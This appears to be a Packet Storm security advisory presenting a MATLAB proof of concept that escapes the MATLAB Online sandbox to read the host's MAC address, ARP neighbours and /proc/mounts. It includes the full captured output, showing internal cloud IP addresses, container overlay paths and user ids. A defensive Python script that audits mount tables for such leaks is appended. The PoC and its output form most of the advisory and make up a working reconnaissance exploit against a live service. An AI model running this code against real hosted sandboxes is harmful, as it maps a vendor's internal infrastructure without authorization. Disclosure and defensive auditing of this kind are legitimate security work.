
📄 MATLAB R2024a Arbitrary Local System Information Disclosure

🗓️ 01 Jun 2026 00:00:00 | Reported by indoushka | Type: packetstorm | 🔗 packetstorm.news

MATLAB R2024a local system information disclosure via sandbox bypass reading MAC, ARP, and mount details.

Code
==================================================================================================================================
    | # Title     : MATLAB R2024a Full Infrastructure Disclosure and Internal Network Mapping via Online Sandbox                     |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://matlab.mathworks.com/                                                                                    |
    ==================================================================================================================================
    
    [+] Summary    : successfully bypassed the sandbox using fileread to extract the host's MAC address and kernel mount details from /proc/mounts.
    
    [+] POC        : Place the code below in the MATLAB command prompt.
    
    try
        eth0_mac = fileread('/sys/class/net/eth0/address');
        fprintf('CRITICAL: eth0 MAC Address: %s', eth0_mac);
    catch
        disp('Could not read eth0 MAC.');
    end
    
    
    [status, arp_info] = system('arp -a');
    if status == 0
        disp('Internal Network Neighbors:');
        disp(arp_info);
    else
        disp('ARP command restricted, trying proc/net/arp...');
        try
            arp_proc = fileread('/proc/net/arp');
            disp(arp_proc);
        catch
            disp('ARP info is fully protected.');
        end
    end
    
    
    [status, mount_details] = system('cat /proc/mounts');
    disp('Mount Points Analysis:');
    disp(mount_details);
    
    [+] Result :
    
    CRITICAL: eth0 MAC Address: 36:ab:51:23:de:f0
    
    Internal Network Neighbors:
    
    ip-10-168-145-28.ec2.internal (10.168.145.28) at 12:0e:10:78:54:72 [ether] on eth0
    
    ? (169.254.1.1) at 12:0e:10:78:54:72 [ether] PERM on eth0
    
    
    Mount Points Analysis:
    
    none / overlay ro,relatime,lowerdir=mnt:etc:/private/bundles/matlab/layer:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/ce13c7ea78933334c2e1bafc9e/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/3afba3aa964848d5d9fd73e385/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/74d0e1fcc28e73c6d1e9a5897c/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/5c9144a16da17f0cc8248d4025/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/2341c3a87f2dabed6c6aa19a00/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/62649978667e9eab27cf0c43d5/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/ac06d2cfa1a32e02a82738120f/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/d687193fa35a62c0d4e87f4851/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/f11bb60810ad7033c841775d67/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/b50fab0d3d288a6f7616b2e793/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/06d5f727f08cb4d3b92cdcd82f/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/4a09ce1ff1f00a289c0c3a60a1/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/e5d8f28f87d2ba2720f9825dd4/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/eb28f642e70c727c67f8d88a18/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/1fb507001f9f8b7a11adf33d83/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/d09af82c869438ebd387274aac/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/2f7571f14c6ff1d57c690bd192/data,upperdir=/private/bundles/matlab/rootfs.upper,workdir=/private/bundles/matlab/rootfs.work,uuid=on,xino=off,nouserxattr 0 0
    
    /dev/nvme1n1 /opt/mlsedu/matlab/SupportPackage ext4 ro,relatime,discard 0 0
    
    /dev/root /home/matlab ext4 rw,relatime,discard,errors=remount-ro 0 0
    
    /dev/root /home/matlab/.MathWorks ext4 rw,relatime,discard,errors=remount-ro 0 0
    
    /dev/root /home/matlab/.MATLABConnector ext4 rw,relatime,discard,errors=remount-ro 0 0
    
    /dev/root /tmp ext4 rw,relatime,discard,errors=remount-ro 0 0
    
    /dev/root /tmp/MathWorks-matlab ext4 rw,relatime,discard,errors=remount-ro 0 0
    
    /dev/root /users ext4 rw,relatime,discard,errors=remount-ro 0 0
    
    /dev/nvme1n1 /MATLAB ext4 ro,relatime,discard 0 0
    
    /dev/root /OneDrive ext4 rw,relatime,discard,errors=remount-ro 0 0
    
    /dev/root /MATLAB\040Drive ext4 rw,relatime,discard,errors=remount-ro 0 0
    
    /dev/root /.session_data ext4 rw,relatime,discard,errors=remount-ro 0 0
    
    /dev/root /MATLAB\040Add-Ons ext4 rw,relatime,discard,errors=remount-ro 0 0
    
    /dev/nvme1n1 /SupportPackages ext4 ro,relatime,discard 0 0
    
    proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
    
    tmpfs /dev tmpfs rw,nosuid,size=100k,mode=755,inode64 0 0
    
    devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666 0 0
    
    shm /dev/shm tmpfs rw,nosuid,nodev,noexec,relatime,size=98304k,inode64 0 0
    
    mqueue /dev/mqueue mqueue rw,nosuid,nodev,noexec,relatime 0 0
    
    devpts /dev/console devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666 0 0
    
    sysfs /sys sysfs ro,nosuid,nodev,noexec,relatime 0 0
    
    overlay:gds://(session_data)/!/ /.session_data fuse.mwfs rw,nosuid,nodev,relatime,user_id=1000600715,group_id=1000600912,default_permissions,allow_other 0 0
    
    overlay:gds://(matlab_drive)/!/ /MATLAB\040Drive fuse.mwfs rw,nosuid,nodev,relatime,user_id=1000600715,group_id=1000600912,default_permissions,allow_other 0 0
    
    overlay:gds://(AddOns)/!/ /MATLAB\040Add-Ons fuse.mwfs rw,nosuid,nodev,relatime,user_id=1000600715,group_id=1000600912,default_permissions,allow_other 0 0
    
    /dev/root /users/mwa0000041333641 ext4 rw,relatime,discard,errors=remount-ro 0 0 
    
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================
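
For an operator reviewing what a session like the one above can learn from its own mount table, the following added example (not part of the original advisory) parses `/proc/mounts`-format text and lists the overlay host paths, the FUSE ids, and whether the two files the PoC read are covered by a mask mount. The sample table, the function names and the mask-mount heuristic are assumptions made for illustration.

```python
import re

SENSITIVE = ("/sys/class/net/eth0/address", "/proc/net/arp")  # files the PoC read

# Constructed sample in /proc/mounts format, modelled on the result above;
# the directory names under lowerdir/upperdir and the ids are placeholders.
SAMPLE = r"""none / overlay ro,lowerdir=mnt:etc:/shared/pool-x/oci/aaa/data:/shared/pool-x/oci/bbb/data,upperdir=/private/bundles/app/rootfs.upper,workdir=/private/bundles/app/rootfs.work 0 0
/dev/root /home/matlab ext4 rw,relatime 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
sysfs /sys sysfs ro,nosuid,nodev,noexec,relatime 0 0
overlay:gds://(matlab_drive)/!/ /MATLAB\040Drive fuse.mwfs rw,nosuid,user_id=1000,group_id=1001 0 0
"""

def unescape(field):
    """Decode the octal escapes (\\040 is a space) used in mount table fields."""
    return re.sub(r"\\([0-7]{3})", lambda m: chr(int(m.group(1), 8)), field)

def parse_mounts(text):
    """Return one dict per well-formed line of the mount table."""
    mounts = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue  # blank or truncated line
        opts = dict(o.partition("=")[::2] for o in parts[3].split(","))
        mounts.append({"target": unescape(parts[1]), "fstype": parts[2], "opts": opts})
    return mounts

def audit(text):
    """Return (path, finding) pairs for details a tenant can read."""
    mounts, findings = parse_mounts(text), []
    for m in mounts:
        if m["fstype"] == "overlay":
            dirs = ":".join(m["opts"].get(k, "") for k in ("lowerdir", "upperdir", "workdir"))
            host = [p for p in dirs.split(":") if p.startswith("/")]
            if host:
                findings.append((m["target"], f"overlay options name {len(host)} host-side paths"))
        if m["fstype"].startswith("fuse.") and "user_id" in m["opts"]:
            findings.append((m["target"], f"FUSE options name uid {m['opts']['user_id']}"))
    # Heuristic (assumption): a masked path appears as its own mount, on the
    # path itself or on a parent directory below the pseudo-filesystem root.
    covers = {m["target"] for m in mounts} - {"/", "/proc", "/sys"}
    for path in SENSITIVE:
        if not any(path == t or path.startswith(t + "/") for t in covers):
            findings.append((path, "no mask mount covers this path"))
    return findings

if __name__ == "__main__":
    print(*audit(SAMPLE), sep="\n")
```

Run against a table captured from inside the session after a configuration change, the findings list should shrink as paths are masked.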
